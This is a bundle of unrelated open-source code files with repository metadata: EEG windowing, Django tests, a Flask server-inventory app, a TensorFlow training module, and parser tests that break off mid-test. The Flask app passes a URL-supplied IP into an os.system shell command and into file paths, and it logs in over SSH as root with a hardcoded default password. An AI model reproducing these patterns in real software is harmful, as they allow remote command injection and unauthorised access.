""" Factory class to create window definition objects with static methods
This WindowFactory provides static methods in order to read a given
Windower specification file, which should be a valid YAML specification
of a window defs, and returns a list of the containing window definitions.
:Author: Jan Hendrik Metzen (jhm@informatik.uni-bremen.de)
:Created: 2008/11/25
"""
@staticmethod
def default_windower_spec():
window_specs = {'skip_ranges': [{'start': 0, 'end': 0}],
'window_defs':
{'window':
{'classname': 'Window',
'markername': 'null',
'jitter': 0,
'endoffsetms': 1000,
'startoffsetms': 0}}}
return WindowFactory.create_window_defs(window_specs)
@staticmethod
def window_definitions_from_yaml(yaml_file):
# Reads and parses the YAML file
# use a default spec, if no windower file is given
window_specs = yaml.load(yaml_file)
return WindowFactory.create_window_defs(window_specs)
@staticmethod
def create_window_defs(window_specs):
"""
Reads from the given file, which should be a valid
YAML specification of a window defs and
returns a list of the window definitions
"""
# The skip ranges are currently not supported correctly by the
# EEG serve. Because of that, we use only the end of the first range
# for specifying skipfirstms
try:
skipfirstms = window_specs['skip_ranges'][0]['end']
except KeyError:
skipfirstms = 0
# An alternative to skip milliseconds is to define a marker that
# labels the ranges to be skiped
if window_specs.has_key('startmarker'):
startmarker = window_specs['startmarker']
else:
startmarker = None
if window_specs.has_key('endmarker'):
endmarker = window_specs['endmarker']
else:
endmarker = None
# Create all ExcludeDef objects which are specified in the YAML file
excludes = {}
excludes_specs = window_specs.get('exclude_defs', {})
for exclude_name, exclude_spec in excludes_specs.iteritems():
marker_names = exclude_spec.pop("markernames")
exclude_defs = []
# For every marker:
for marker_name in marker_names:
# Create a separate ExcludeDef
exclude_defs.append(ExcludeDef(markername = marker_name,
**exclude_spec))
excludes[exclude_name] = exclude_defs
# Create all IncludeDef objects which are specified in the YAML file (copy of exclude with 'ex'-->'in')
includes = {}
includes_specs = window_specs.get('include_defs', {})
for include_name, include_spec in includes_specs.iteritems():
marker_names = include_spec.pop("markernames")
include_defs = []
# For every marker:
for marker_name in marker_names:
# Create a separate IncludeDef
include_defs.append(IncludeDef(markername = marker_name,
**include_spec))
includes[include_name] = include_defs
# Create all windows defs for the windower (parts with 'ex' copied and replaced by 'in')
# If no defs are set, an empty dict of defs is created
if window_specs.has_key('window_def_specs'):
window_defs = {}
for spec_name, spec in window_specs['window_def_specs'].iteritems():
if spec['markername'] == 'null':
win_def = {}
win_def.update({'classname':spec['classname']})
win_def.update({'markername':spec['markername']})
win_def.update({'startoffsetms':spec['startoffsetms']})
win_def.update({'endoffsetms':spec['endoffsetms']})
win_def.update({'jitter': spec['jitter']})
win_def.update({'excludedefs' : spec['excludedefs']})
window_name = spec['windownameprefix']
window_defs.update({window_name:win_def})
else:
for i in range(int(spec['startblockms']), int(spec['endblockms'])+int(spec['stepms']), int(spec['stepms'])):
win_def = {}
win_def.update({'classname':spec['classname']})
win_def.update({'markername':spec['markername']})
win_def.update({'startoffsetms':i})
win_def.update({'endoffsetms':i + int(spec['windowlengthms'])})
win_def.update({'jitter': spec['jitter']})
win_def.update({'excludedefs' : spec['excludedefs']})
window_name = '%s%s' % (spec['windownameprefix'], str(win_def['endoffsetms']).zfill(3))
window_defs.update({window_name:win_def})
window_specs['window_defs'] = window_defs
windows = []
for window_name, window_spec in window_specs['window_defs'].iteritems():
exclude_defs = []
include_defs = []
if window_spec.has_key('excludedefs'):
for exclude_name in window_spec['excludedefs']:
exclude_defs.extend(excludes[exclude_name])
if window_spec.has_key('includedefs'):
for include_name in window_spec['includedefs']:
include_defs.extend(includes[include_name])
window_spec['excludedefs'] = exclude_defs
window_spec['includedefs'] = include_defs
windows.append(
LabeledWindowDef(windef_name = window_name,
skipfirstms = skipfirstms,
startmarker = startmarker,
endmarker = endmarker,
**window_spec))
return windows | {
"content_hash": "6b5f88c7efd0a8c5ac67a81814d3f73d",
"timestamp": "",
"source": "github",
"line_count": 1167,
"max_line_length": 128,
"avg_line_length": 43.36846615252785,
"alnum_prop": 0.5582383276362846,
"repo_name": "pyspace/pyspace",
"id": "e3f394815a705d02b75e6d21275f90ae06ab1a1d",
"size": "50635",
"binary": false,
"copies": "3",
"ref": "refs/heads/master",
"path": "pySPACE/missions/support/windower.py",
"mode": "33261",
"license": "bsd-3-clause",
"language": [
{
"name": "C",
"bytes": "11128"
},
{
"name": "C++",
"bytes": "309606"
},
{
"name": "Matlab",
"bytes": "3768"
},
{
"name": "Python",
"bytes": "3160853"
},
{
"name": "QMake",
"bytes": "3217"
},
{
"name": "Shell",
"bytes": "253"
}
],
"symlink_target": ""
} |
from django.test import TestCase
from yacon.models.site import Site
from yacon.tests.utils import create_test_site
# ============================================================================
class ManagementCommandTests(TestCase):
def setUp(self):
create_test_site()
def test_check_commands(self):
# check that the 'blah' site was created
site = Site.objects.get(name='my_name')
self.assertTrue(site)
# check that the default site was created
site = Site.objects.get(name='Localhost Site')
self.assertTrue(site)
# check that test data was created
pp = site.parse_path('/articles/health/')
self.assertTrue(pp.node)
| {
"content_hash": "da203732dab5512882ad10988991af4f",
"timestamp": "",
"source": "github",
"line_count": 23,
"max_line_length": 78,
"avg_line_length": 30.91304347826087,
"alnum_prop": 0.5893108298171589,
"repo_name": "cltrudeau/django-yacon",
"id": "751f9e17ad4035a5eb2f2b3e2be44125575b21fa",
"size": "711",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "yacon/tests/test_commands.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "CSS",
"bytes": "39473"
},
{
"name": "HTML",
"bytes": "102299"
},
{
"name": "JavaScript",
"bytes": "121614"
},
{
"name": "Python",
"bytes": "303378"
},
{
"name": "Shell",
"bytes": "1134"
}
],
"symlink_target": ""
} |
from flask import Flask,send_file
from flask.ext.cors import CORS
from qrcode import *
import pexpect
import json
import re
import os
import pexpect
import sys
import reachable_ips
import is_ssh
app = Flask(__name__)
cors = CORS(app)
@app.route("/<info>/<ip>")
@app.route("/<info>/<ip>/<eth>")
@app.route("/<info>/<ip>/<username>/<password>")
@app.route("/<info>/<ip>/<eth>/<username>/<password>")
def hello(info,ip,eth='eth0',username="root",password="rootroot"):
if info != "ssh":
child = pexpect.spawn ('ssh '+username+'@'+ip)
i = child.expect([pexpect.TIMEOUT,'.*password: ','.*(yes/no)? ', pexpect.EOF])
if i == 2: # In this case SSH does not have the public key cached.
child.sendline ('yes')
child.expect ('.*password: ')
child.sendline (password)
#child.expect ('.*#')
j = child.expect (['.*#','.*password:'])
if j == 1:
return "ACCESS DENIED ! ENTER CORRECT USERNAME or PASSWORD !"
elif i == 1:
child.sendline (password)
j = child.expect (['.*#','.*password:'])
if j == 1:
return "ACCESS DENIED ! ENTER CORRECT USERNAME or PASSWORD !"
else:
return "ERROR! could not login with SSH.:"
#print ip
if info == "os":
child.sendline ('uname -n')
child.expect ('.*#')
hostname = str(child.after).split("\n")[1]
child.sendline ('uname -m')
child.expect ('.*#')
bit = str(child.after).split("\n")[1]
child.sendline ('lsb_release -d')
child.expect ('.*#')
os = str(child.after).split("\n")[1].split(":")[1].strip()
if re.search('Desc',(child.after)):
pass
else:
child.sendline ('cat /etc/*redhat*')
child.expect ('.*#')
os = str((child.after).split("\n")[1])
return "HOSTNAME : "+hostname+"\n"+ \
"OS : "+os+"\n"+ \
"ARCHITECURE : "+bit
elif info == "ram":
# RAM DETAILS
child.sendline ('free -m')
child.expect ('.*#')
ram_details = str(child.after).split("\n")[2].split(":")[1]
ram_details = re.sub("[ ]{1,}"," ",ram_details).split(" ")
ram_total = str(ram_details[1]) + " MB"
ram_used = str(ram_details[2]) + " MB"
ram_free = str(ram_details[3]) + " MB"
return "RAM TOTAL : "+ram_total+"\n"+ \
"RAM USED : "+ram_used+"\n"+ \
"RAM FREE : "+ram_free
elif info == "code":
qr = QRCode(version=20, error_correction=ERROR_CORRECT_L)
qr.add_data("pell-checker was created and developed by Reverso-Softissimo in addition to the online ...")
qr.make() # Generate the QRCode itself
# im contains a PIL.Image.Image object
im = qr.make_image()
# To save it
#im.save("filename.png")
img_io = StringIO()
pil_img.save(img_io, 'JPEG', quality=70)
img_io.seek(0)
return send_file(img_io, mimetype='image/jpeg')
#return send_file(filename, mimetype='image/png')
elif info == "processor":
#NO. OF PROCESSING UNITS
child.sendline ('cat /proc/cpuinfo | grep processor | wc -l')
child.expect ('.*#')
No_of_processor = str(child.after).split("\n")[1].strip()
#PROCESSOR MODEL
child.sendline ('cat /proc/cpuinfo | grep name')
child.expect ('.*#')
processor_model = str(child.after).split("\n")[1].split(":")[1].strip()
#NO. OF CPU CORES
child.sendline ('cat /proc/cpuinfo | grep cores')
child.expect ('.*#')
cpu_core = str(child.after).split("\n")[1].split(":")[1].strip()
return "NO. OF PROCESSOR : "+No_of_processor+"\n" \
"PROCESSOR MODEL : "+processor_model+"\n" \
"NO. OF CPU CORE : "+cpu_core
elif info == "interfaces":
child.sendline ('ifconfig')
child.expect ('.*#')
ifconfig_lines = (child.after)
#data = ""
#for lines in ifconfig_lines:
# data = data+"\n"+lines
return ifconfig_lines
elif info == "storage":
child.sendline ('df -H')
child.expect ('.*#')
ifconfig_lines = (child.after)
#return str(ifconfig_lines)
#data = ""
#for lines in ifconfig_lines:
# data = data+"\n"+lines
return ifconfig_lines
elif info == "select_eth":
child.sendline ('ifconfig')
child.expect ('.*#')
ifconfig_lines = str(child.after).split("\n")
eths = ""
for lines in ifconfig_lines:
if re.search(r'eth',lines):
if re.search(r'ether',lines):
pass
else:
interface_name = lines.split('Link')[0].strip()
eths = eths+','+interface_name
if re.search(r'flags',lines):
interface_name = lines.split('flags')[0].strip()
eths = eths+','+interface_name
eth_names = re.sub(r':',"",eths)[1:].strip()
return eth_names
elif info == "ethernet":
child.sendline ('ifconfig '+eth)
child.expect ('.*#')
ifconfig_lines = str(child.after).split("\n")
#TO GET MAC
if re.search(r'HWaddr',ifconfig_lines[1]):
#interface_name = lines.split('Link')[0].strip()
interface_mac = ifconfig_lines[1].split('HWaddr')[1].strip()
elif re.search(r'ether',ifconfig_lines[4]):
interface_mac = ifconfig_lines[4].split('txqueuelen')[0].split('ether')[1].strip()
else:
interface_mac = "UNABLE TO GET MAC"
# TO GET IP
if re.search(r'Bcast',ifconfig_lines[2]):
if re.search(r'inet addr',ifconfig_lines[2]):
interface_ip = ifconfig_lines[2].split('Bcast')[0].split(':')[1].strip()
elif re.search(r'broadcast',ifconfig_lines[2]):
interface_ip = ifconfig_lines[2].split('netmask')[0].split('inet')[1].strip()
else:
interface_ip = 'No Ip'
child.sendline ('ethtool '+eth)
child.expect ('.*#')
ethtool_details1 = (child.after)
ethtool_details = list((child.after).split("\n"))
#print ethtool_details.strip()
for ethtool_detail in ethtool_details:
#print ethtool_detail
if re.search(r'[s|S]peed',ethtool_detail):
interface_speed = ethtool_detail.split(":")[1].strip()
elif re.search(r'Link detected',ethtool_detail):
interface_link_status = ethtool_detail.split(":")[1].strip()
# INTERFACE DRIVER
try:
child.sendline ('lshw -short | grep '+eth)
child.expect ('.*#')
interface_driver = str(child.after).split("\n")[1]
interface_driver = re.sub("[ ]{1,}"," ",interface_driver).split("network")[1].strip()
except:
interface_driver = "UNABLE TO GET DRIVER INFO"
return "IP : "+interface_ip+"\n" \
"MAC : "+interface_mac+"\n" \
"SPEED : "+interface_speed+"\n" \
"DRIVER : "+interface_driver+"\n" \
"LINK STATUS : "+interface_link_status
elif info == "ssh":
ip = "192.168."+ip+".*"
#network = [ip]
#ip_list = is_ssh.ssh_ips(network)
f = open("ips_"+ip+".txt","r")
data = f.read()
f.close()
return data
#return "sssh"
else:
child.sendline ('logout')
os.system("python difos.py "+ip+" > result_"+ip+".txt")
f = open("result_"+ip+".txt","r")
data = ""
for line in f.readlines():
data = data
data = data+line
#print data
return data
if __name__ == "__main__":
app.run(host= '0.0.0.0')
#is_ssh.ssh_ips()
| {
"content_hash": "a54e93e13fcf5ed96568b09d0d4755cb",
"timestamp": "",
"source": "github",
"line_count": 227,
"max_line_length": 107,
"avg_line_length": 30.929515418502202,
"alnum_prop": 0.584247258225324,
"repo_name": "MuthuramanG/SpotLight",
"id": "fc83d66421c5c49acca132cdcab9f32756531238",
"size": "7021",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "SpotLight.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Python",
"bytes": "8965"
}
],
"symlink_target": ""
} |
import tqdm
import numpy as np
import tensorflow as tf
import matplotlib.pyplot as plt
import utils.filesys as fs
import utils.utils as ut
import utils.tfw as tfw
import utils.printer as pr
import utils.datasets as ds
""" A combination of modules that interacts with environment """
class Model:
def __init__(self, name, **kwargs):
self.name = name
self._make_model(**kwargs)
self._set_description()
self._make_var_dict()
self._make_session()
def __del__(self):
self.sess.close()
def _set_description(self, **kwargs):
desc = 'name: {0}'.format(self.name)
for module in self.modules:
desc += '\n/{0}: {1}'.format(module.name, module.get_description())
self._make_description(desc)
def _make_description(self, desc):
self.description = desc
self.desc = tf.summary.text(
'description', tf.convert_to_tensor(desc))
def _make_model(self, **kwargs):
self.modules = []
def _make_var_dict(self):
self.var_dict = {}
for module in self.modules:
self.var_dict.update(module.var_dict)
def _make_session(self):
self.model_saver = tf.train.Saver(self.var_dict)
self.initializer = tf.global_variables_initializer()
self.sess = tf.Session()
self.reset()
self.print_num_params()
def print_num_params(self):
for module in self.modules:
pr.log('# of params in {0}: {1}'.format(
module.name, module.get_num_params()))
def reset(self):
self.sess.run(self.initializer)
def save(self, path):
fs.check_dir(path, make=True)
self.model_saver.save(self.sess, path)
def load(self, path):
fs.check_dir(path, fatal=True)
self.model_saver.restore(self.sess, path)
#---------------------------------------------------------------------------#
#--------------------------------- System ----------------------------------#
#---------------------------------------------------------------------------#
class System:
def __init__(self, dataset):
self.dataset = dataset
def train_x(self, train_func, batch_count=100, batch_size=20, procs=[], **kwargs):
gen = ds.batch_generator(self.dataset['train'], batch_count, batch_size)
for batch in gen:
result = train_func(batch['x'], **kwargs)
for proc in procs:
proc.process(batch, result)
def train_xy(self, train_func, batch_count=100, batch_size=20, procs=[], **kwargs):
gen = ds.batch_generator(self.dataset['train'], batch_count, batch_size)
for batch in gen:
result = train_func(batch['x'], batch['y'], **kwargs)
for proc in procs:
proc.process(batch, result)
def train_batch(self, train_func, batch_count=100, batch_size=20, procs=[], **kwargs):
gen = ds.batch_generator(self.dataset['train'], batch_count, batch_size)
for batch in gen:
result = train_func(batch, batch_count, **kwargs)
for proc in procs:
proc.process(batch, result)
def test_x(self, test_func, batch_size=100):
gen = ds.epoch_generator(self.dataset['test'], batch_size)
results = []
for batch in gen:
results.append(test_func(batch['x']))
return np.mean(results)
def test_xy(self, test_func, batch_size=100):
gen = ds.epoch_generator(self.dataset['test'], batch_size)
results = []
for batch in gen:
results.append(test_func(batch['x'], batch['y']))
return np.mean(results)
#---------------------------------------------------------------------------#
#------------------------------- Processors --------------------------------#
#---------------------------------------------------------------------------#
class ResultProcessor:
def process(self, batch, result):
pass
class Logger(ResultProcessor):
def __init__(self, model, log_dir='./log/', scalar_step=1, image_step=1000):
self.log_dir = log_dir + str(ut.generate_id()) + '/'
fs.check_dir(self.log_dir, make=True)
self.summary_saver = tf.summary.FileWriter(self.log_dir, model.sess.graph)
self.log(model.sess.run(model.desc))
self.scalar_step = scalar_step
self.image_step = image_step
def process(self, batch, result):
gs = result['global_step']
s = result.get('summary', None)
si = result.get('summary-image', None)
if gs % self.scalar_step == 0:
self.log(s, gs)
if gs % self.image_step == 0:
self.log(si, gs)
def log(self, summary=None, global_step=0):
if summary is not None:
self.summary_saver.add_summary(summary, global_step)
class Reporter(ResultProcessor):
def __init__(self, steps=100, kwords=[], log_dir=None):
self.steps = steps
self.kwords = kwords
self.log_dir = log_dir
def process(self, batch, result):
step = batch['step']
if step % self.steps == 0:
report = '[step {0}]'.format(step)
if 'global_step' in result:
report += '[gstep {0}]'.format(result['global_step'])
for word in self.kwords:
report += '[{0} {1:.4f}]'.format(word, result[word])
tqdm.tqdm.write(report)
self.log2file(report)
def log2file(self, msg):
if self.log_dir is not None:
with open(self.log_dir + "report.txt", "a") as file:
file.write(msg + "\n")
file.close()
class Presenter(ResultProcessor):
def __init__(self, name, sess, func, fig_num=1, steps=100, logger=None):
self.name = name
self.sess = sess
self.func = func
self.fig_num = fig_num
self.steps = steps
self.logger = logger
plt.ion()
if logger is not None:
image = func()
self.image_ph = tf.placeholder(shape=image.shape, dtype=tf.float32)
self.image_r = tfw.compact(self.image_ph)
self.summary = tf.summary.image(name, self.image_r)
def __del__(self):
plt.ioff()
plt.show()
def process(self, batch, result):
gstep = result['global_step']
if gstep % self.steps == 0:
images = self.func()
# Summarizing the image
if self.logger is not None:
self.logger.log(
self.sess.run(self.summary, {self.image_ph: images}), gstep)
# Displaying the image
plt.figure(self.fig_num)
ut.show2(images)
plt.pause(1e-5)
| {
"content_hash": "19f1fa7e4395cf7e505d6b01f1f2cb54",
"timestamp": "",
"source": "github",
"line_count": 208,
"max_line_length": 87,
"avg_line_length": 28.0625,
"alnum_prop": 0.6176117868768203,
"repo_name": "MehranMirkhan/ai_system",
"id": "a58168979af6c28358f98a6a699ff08e6b815433",
"size": "5838",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "models/model.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "60608"
}
],
"symlink_target": ""
} |
"""Test the runtime.parser module."""
import unittest
import runtime.lexer
import runtime.env
import runtime.flags
from runtime.parser import *
def token(value, kind):
return lexer.TokenTuple(value=value, kind=kind)
asgn_token = token("=", lexer.OPERATOR)
asgnadd_token = token("+=", lexer.OPERATOR)
asgnsub_token = token("-=", lexer.OPERATOR)
asgnmul_token = token("*=", lexer.OPERATOR)
asgndiv_token = token("/=", lexer.OPERATOR)
asgnpow_token = token("^=", lexer.OPERATOR)
asgnmod_token = token("%=", lexer.OPERATOR)
plus_token = token("+", lexer.OPERATOR)
minus_token = token("-", lexer.OPERATOR)
neg_token = token("!", lexer.OPERATOR)
and_token = token("&&", lexer.OPERATOR)
or_token = token("||", lexer.OPERATOR)
xor_token = token("^|", lexer.OPERATOR)
equal_token = token("==", lexer.OPERATOR)
unequal_token = token("!=", lexer.OPERATOR)
smaller_token = token("<", lexer.OPERATOR)
larger_token = token(">", lexer.OPERATOR)
smequ_token = token("<=", lexer.OPERATOR)
lgequ_token = token(">=", lexer.OPERATOR)
mod_token = token("%", lexer.OPERATOR)
type_token = token(":", lexer.OPERATOR)
multiply_token = token("*", lexer.OPERATOR)
divide_token = token("/", lexer.OPERATOR)
power_token = token("^", lexer.OPERATOR)
lprt_token = token(")", lexer.LPRT)
sep_token = token(",", lexer.SEPARATOR)
identifier_token = token("abc", lexer.IDENTIFIER)
string_token = token("\"abc\"", lexer.STRING)
rprt_token = token("(", lexer.RPRT)
number_token = token("1", lexer.NUMBER)
operation_tokens = [plus_token, minus_token, sep_token, lprt_token, None]
value_tokens = [identifier_token, string_token, rprt_token, number_token]
all_tokens = operation_tokens + value_tokens
def clean_lex(expr):
clean = lexer.run(expr)
output = []
for e in clean:
if e.kind is not lexer.WHITESPACE:
output.append(e)
return output
class TestParser(unittest.TestCase):
"""Test the parser."""
def test_is_assignment(self):
cases = [
(asgn_token, True),
(asgnadd_token, True),
(asgnsub_token, True),
(asgnmul_token, True),
(asgndiv_token, True),
(asgnmod_token, True),
(asgnpow_token, True),
(None, False),
(number_token, False),
]
for tc in cases:
self.assertEqual(is_assignment(tc[0]), tc[1],
"%s mistakingly reported as assignment" % str(tc[0]))
def test_matching_block(self):
cases = [
(clean_lex("{}"), 1),
(clean_lex("{"), -1),
(clean_lex("}"), -1),
(clean_lex("{{}"), -1),
(clean_lex("{{}}"), 3),
(clean_lex("{ 123; }"), 3),
]
for tc in cases:
self.assertEqual(find_matching_block(tc[0], 1), tc[1])
def test_matching_prt(self):
cases = [
(clean_lex("()"), 1),
(clean_lex("("), -1),
(clean_lex(")"), -1),
(clean_lex("(()"), -1),
(clean_lex("(123)"), 2),
(clean_lex("(12 12)"), 3),
]
for tc in cases:
self.assertEqual(find_matching_prt(tc[0], 1), tc[1])
def test_arg_count(self):
cases = [
(plus_token, value_tokens, 2),
(plus_token, operation_tokens, 1),
(minus_token, value_tokens, 2),
(minus_token, operation_tokens, 1),
(neg_token, value_tokens, 1),
(neg_token, operation_tokens, 1),
(and_token, all_tokens, 2),
(or_token, all_tokens, 2),
(xor_token, all_tokens, 2),
(equal_token, all_tokens, 2),
(unequal_token, all_tokens, 2),
(smaller_token, all_tokens, 2),
(larger_token, all_tokens, 2),
(smequ_token, all_tokens, 2),
(lgequ_token, all_tokens, 2),
(mod_token, all_tokens, 2),
(type_token, all_tokens, 2),
(multiply_token, all_tokens, 2),
(divide_token, all_tokens, 2),
(power_token, all_tokens, 2),
(asgn_token, all_tokens, 2),
(asgnadd_token, all_tokens, 2),
(asgnsub_token, all_tokens, 2),
(asgnmul_token, all_tokens, 2),
(asgndiv_token, all_tokens, 2),
(asgnpow_token, all_tokens, 2),
(asgnmod_token, all_tokens, 2),
]
for tc in cases:
for e in tc[1]:
self.assertEqual(get_arg_count(tc[0].value, e), tc[2],
"bad operator arg count for %s when tested against %s" % (tc[0].value, e))
def test_precedence(self):
cases = [
(neg_token, all_tokens, 7),
(plus_token, operation_tokens, 7),
(minus_token, operation_tokens, 7),
(power_token, all_tokens, 6),
(divide_token, all_tokens, 5),
(multiply_token, all_tokens, 5),
(plus_token, value_tokens, 4),
(minus_token, value_tokens, 4),
(type_token, all_tokens, 4),
(mod_token, all_tokens, 3),
(smaller_token, all_tokens, 2),
(larger_token, all_tokens, 2),
(smequ_token, all_tokens, 2),
(lgequ_token, all_tokens, 2),
(equal_token, all_tokens, 2),
(unequal_token, all_tokens, 2),
(and_token, all_tokens, 1),
(or_token, all_tokens, 1),
(xor_token, all_tokens, 1),
(asgn_token, all_tokens, 0),
(asgnadd_token, all_tokens, 0),
(asgnsub_token, all_tokens, 0),
(asgnmul_token, all_tokens, 0),
(asgndiv_token, all_tokens, 0),
(asgnpow_token, all_tokens, 0),
(asgnmod_token, all_tokens, 0),
]
for tc in cases:
for e in tc[1]:
self.assertEqual(get_precedence(tc[0].value, e), tc[2],
"bad operator precedence for %s when tested against %s" % (tc[0].value, e))
def test_associativity(self):
cases = [
(neg_token, all_tokens, False),
(plus_token, operation_tokens, False),
(minus_token, operation_tokens, False),
(power_token, all_tokens, False),
(divide_token, all_tokens, True),
(multiply_token, all_tokens, True),
(plus_token, value_tokens, True),
(minus_token, value_tokens, True),
(type_token, all_tokens, True),
(mod_token, all_tokens, True),
(smaller_token, all_tokens, True),
(larger_token, all_tokens, True),
(smequ_token, all_tokens, True),
(lgequ_token, all_tokens, True),
(equal_token, all_tokens, True),
(unequal_token, all_tokens, True),
(and_token, all_tokens, True),
(or_token, all_tokens, True),
(xor_token, all_tokens, True),
(asgn_token, all_tokens, True),
(asgnadd_token, all_tokens, True),
(asgnsub_token, all_tokens, True),
(asgnmul_token, all_tokens, True),
(asgndiv_token, all_tokens, True),
(asgnpow_token, all_tokens, True),
(asgnmod_token, all_tokens, True),
]
for tc in cases:
for e in tc[1]:
self.assertEqual(is_left_associative(tc[0].value, e), tc[2],
"bad operator associativity for %s when tested against %s" % (tc[0].value, e))
def test_expression(self):
pass
def test_declaration(self):
# case 1: var a: int, length 4
case1 = ast.Sequence()
case1.add(ast.Declaration("a", "int"))
# case 2: var a = null, length 4
case2 = ast.Sequence()
case2.add(ast.Declaration("a", "null"))
case2_assgn = ast.Assignment("a", True)
case2_assgn.add(ast.Literal(env.Value(env.NULL)))
case2.add(case2_assgn)
# case 3: var a: int = null, length 6
case3 = ast.Sequence()
case3.add(ast.Declaration("a", "int"))
case3_assgn = ast.Assignment("a", False)
case3_assgn.add(ast.Literal(env.Value(env.NULL)))
case3.add(case3_assgn)
# case 4: var a, b = null, length 6
case4 = ast.Sequence()
case4.add(ast.Declaration("a", "null"))
case4.add(ast.Declaration("b", "null"))
case4_assgn_a = ast.Assignment("a", True)
case4_assgn_a.add(ast.Literal(env.Value(env.NULL)))
case4_assgn_b = ast.Assignment("b", True)
case4_assgn_b.add(case4_assgn_a)
case4.add(case4_assgn_b)
# case 5: var a, b, c: int = null, length 10
case5 = ast.Sequence()
case5.add(ast.Declaration("a", "int"))
case5.add(ast.Declaration("b", "int"))
case5.add(ast.Declaration("c", "int"))
case5_assgn_a = ast.Assignment("a", False)
case5_assgn_a.add(ast.Literal(env.Value(env.NULL)))
case5_assgn_b = ast.Assignment("b", False)
case5_assgn_b.add(case5_assgn_a)
case5_assgn_c = ast.Assignment("c", False)
case5_assgn_c.add(case5_assgn_b)
case5.add(case5_assgn_c)
cases = [
("var a: int", case1, 3),
("var a = null", case2, 3),
("var a: int = null", case3, 5),
("var a, b = null", case4, 5),
("var a, b, c: int = null", case5, 9)
]
for tc in cases:
output, offset = generate_declaration(clean_lex(tc[0]))
self.assertEqual(output, tc[1],
"%s is not equal to %s" % (str(output), str(tc[1])))
self.assertEqual(offset, tc[2],
"%s offset %d is not equal to %d" % (str(output), offset, tc[2]))
# error-case 6: var a
# error-case 7: var a: null, b: null
# error-case 8: var a: null, b
error_cases = [
("var a", ParseException),
("var a: null, b: null", ParseException),
("var a: null, b", ParseException),
]
for tc in error_cases:
tokens = clean_lex(tc[0])
self.assertRaises(tc[1], generate_declaration, tokens)
def test_assignment(self):
case1_assgn = ast.Assignment("a")
case1_assgn.add(ast.Identifier("a"))
case1 = case1_assgn
case2_assgn = ast.Assignment("a")
case2_assgnadd = ast.Operation("+")
case2_assgnadd.add(ast.Identifier("a"))
case2_assgnadd.add(ast.Literal(env.Value(env.NULL)))
case2_assgn.add(case2_assgnadd)
case2 = case2_assgn
case3_assgn = ast.Assignment("a")
case3_assgnsub = ast.Operation("-")
case3_assgnsub.add(ast.Identifier("a"))
case3_assgnsub.add(ast.Literal(env.Value(env.NULL)))
case3_assgn.add(case3_assgnsub)
case3 = case3_assgn
case4_assgn = ast.Assignment("a")
case4_assgnmul = ast.Operation("*")
case4_assgnmul.add(ast.Identifier("a"))
case4_assgnmul.add(ast.Literal(env.Value(env.NULL)))
case4_assgn.add(case4_assgnmul)
case4 = case4_assgn
case5_assgn = ast.Assignment("a")
case5_assgndiv = ast.Operation("/")
case5_assgndiv.add(ast.Identifier("a"))
case5_assgndiv.add(ast.Literal(env.Value(env.NULL)))
case5_assgn.add(case5_assgndiv)
case5 = case5_assgn
case6_assgn = ast.Assignment("a")
case6_assgnpow = ast.Operation("^")
case6_assgnpow.add(ast.Identifier("a"))
case6_assgnpow.add(ast.Literal(env.Value(env.NULL)))
case6_assgn.add(case6_assgnpow)
case6 = case6_assgn
case7_assgn = ast.Assignment("a")
case7_assgnmod = ast.Operation("%")
case7_assgnmod.add(ast.Identifier("a"))
case7_assgnmod.add(ast.Literal(env.Value(env.NULL)))
case7_assgn.add(case7_assgnmod)
case7 = case7_assgn
cases = [
("a = a", case1, 2),
("a += null", case2, 2),
("a = a + null", case2, 4),
("a -= null", case3, 2),
("a = a - null", case3, 4),
("a *= null", case4, 2),
("a = a * null", case4, 4),
("a /= null", case5, 2),
("a = a / null", case5, 4),
("a ^= null", case6, 2),
("a = a ^ null", case6, 4),
]
for tc in cases:
output, offset = generate_assignment(clean_lex(tc[0]))
self.assertEqual(output, tc[1], "%s is not equal to %s" % (output, tc[1]))
self.assertEqual(offset, tc[2], "%s offset %d is not equal to %d" % (output, offset, tc[2]))
error_cases = [
("a =", ParseException),
("a", ParseException),
("= 2", ParseException),
("a == 2", ParseException),
("a = = 2", ParseException),
("a ; = 2", ParseException),
]
for tc in error_cases:
self.assertRaises(tc[1], generate_assignment, clean_lex(tc[0]))
def test_function(self):
pass
def test_if(self):
# case 1: if (null) {;}, offset 6
case1 = ast.Branch()
case1_cond = ast.Conditional()
case1_cond.add(ast.Literal(env.Value(env.NULL)))
case1_cond.add(ast.Sequence())
case1.add(case1_cond)
# case 2: if (null) {;} else {;}, offset 10
case2 = ast.Branch()
case2_cond = ast.Conditional()
case2_cond.add(ast.Literal(env.Value(env.NULL)))
case2_cond.add(ast.Sequence())
case2.add(case2_cond)
case2.add(ast.Sequence())
# case 3: if (null) {;} else if (null) {;}, offset 14
case3 = ast.Branch()
case3_if = ast.Conditional()
case3_if.add(ast.Literal(env.Value(env.NULL)))
case3_if.add(ast.Sequence())
case3_elif = ast.Branch()
case3_elif_cond = ast.Conditional()
case3_elif_cond.add(ast.Literal(env.Value(env.NULL)))
case3_elif_cond.add(ast.Sequence())
case3_elif.add(case3_elif_cond)
case3.add(case3_if)
case3.add(case3_elif)
# case 4: if (null) {;} else if (null) {;} else {;}, offset 18
case4 = ast.Branch()
case4_if = ast.Conditional()
case4_if.add(ast.Literal(env.Value(env.NULL)))
case4_if.add(ast.Sequence())
case4_elif = ast.Branch()
case4_elif_cond = ast.Conditional()
case4_elif_cond.add(ast.Literal(env.Value(env.NULL)))
case4_elif_cond.add(ast.Sequence())
case4_elif.add(case4_elif_cond)
case4_elif.add(ast.Sequence())
case4.add(case4_if)
case4.add(case4_elif)
cases = [
("if (null) {;}", case1, 6),
("if (null) {;} else {;}", case2, 10),
("if (null) {;} else if (null) {;}", case3, 14),
("if (null) {;} else if (null) {;} else {;}", case4, 18)
]
for tc in cases:
output, offset = generate_if(clean_lex(tc[0]))
self.assertEqual(output, tc[1], "%s is not equal to %s" % (output, tc[1]))
self.assertEqual(offset, tc[2], "%s offset %d is not equal to %d" % (output, offset, tc[2]))
error_cases = [
("if () {}", ParseException),
("if {} else ()", ParseException),
("if () else if {}", ParseException),
]
for tc in error_cases:
tokens = clean_lex(tc[0])
self.assertRaises(tc[1], generate_if, tokens)
def test_for(self):
# case 1: for (var a: int = 0; a < 100; a += 1) {;}, offset 18
case1 = ast.Sequence()
